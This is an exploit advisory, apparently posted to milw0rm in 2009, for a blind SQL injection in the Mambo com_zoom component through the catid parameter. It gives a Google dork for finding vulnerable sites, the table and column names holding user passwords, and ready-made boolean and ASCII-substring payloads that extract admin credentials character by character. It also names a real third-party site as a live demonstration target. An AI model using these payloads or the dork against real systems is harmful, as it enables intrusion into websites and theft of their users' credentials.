82 lines
No EOL
3.1 KiB
Text
82 lines
No EOL
3.1 KiB
Text
Mambo component com_zoom (catid) Blind SQL injection [_][-][X]
|
|
_ ___ _ ___ ___ ___ _____ __ ___ __ __ ___
|
|
| |/ / || |/ __|___ / __| _ \ __\ \ / / |_ ) \ / \/ _ \
|
|
| ' <| __ | (_ |___| (__| / _| \ \/\/ / / / () | () \_, /
|
|
|_|\_\_||_|\___| \___|_|_\___| \_/\_/ /___\__/ \__/ /_/
|
|
|
|
|
|
Red n'black i dress eagle on my chest.
|
|
It's good to be an ALBANIAN Keep my head up high for that flag i die.
|
|
Im proud to be an ALBANIAN
|
|
###################################################################
|
|
|
|
Author : boom3rang
|
|
Contact : boom3rang[at]live.com
|
|
Greetz : H!tm@N - KHG - cHs
|
|
|
|
R.I.P redc00de
|
|
-------------------------------------------------------------------
|
|
|
|
Affected software description
|
|
<name>zoom</name>
|
|
<creationDate>20/01/2004</creationDate>
|
|
<author>Mike de Boer</author>
|
|
<authorEmail>mailme@mikedeboer.nl</authorEmail>
|
|
<authorUrl>www.mikedeboer.nl</authorUrl>
|
|
<version>2.0</version>
|
|
-------------------------------------------------------------------
|
|
|
|
[~] SQLi :
|
|
|
|
http://www.TARGET.com/index.php?option=com_zoom&Itemid=0&catid=[SQLi]
|
|
|
|
[~]Google Dork :
|
|
|
|
inurl:com_zoom inurl:"imgid"
|
|
|
|
-------------------------------------------------------------------
|
|
|
|
[~] Table_NAME = mos_users
|
|
[~] Column_NAME = username - password
|
|
-------------------------------------------------------------------
|
|
|
|
[~] Admin Path :
|
|
|
|
http://www.TARGET.com/administrator
|
|
|
|
===================================================================
|
|
= POC =
|
|
===================================================================
|
|
|
|
|
|
[~] Live Demo:
|
|
ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=1/* --> True
|
|
ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=2/* --> False
|
|
|
|
-------------------------------------------------------------------
|
|
|
|
[~] ASCII
|
|
index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96
|
|
|
|
-------------------------------------------------------------------
|
|
|
|
[~] Live Demo ASCII
|
|
|
|
True
|
|
http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96
|
|
|
|
False
|
|
http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>97
|
|
|
|
Like we see, the first charter of username is 'a' char(97)=a
|
|
Now you can change the second limit to find other charters, Good Luck...
|
|
|
|
note:
|
|
<name>zoom</name>
|
|
<creationDate>20/01/2004</creationDate>
|
|
<author>Mike de Boer</author>
|
|
<authorEmail>mailme@mikedeboer.nl</authorEmail>
|
|
<authorUrl>www.mikedeboer.nl</authorUrl>
|
|
<version>2.0</version>
|
|
|
|
# milw0rm.com [2009-09-04] |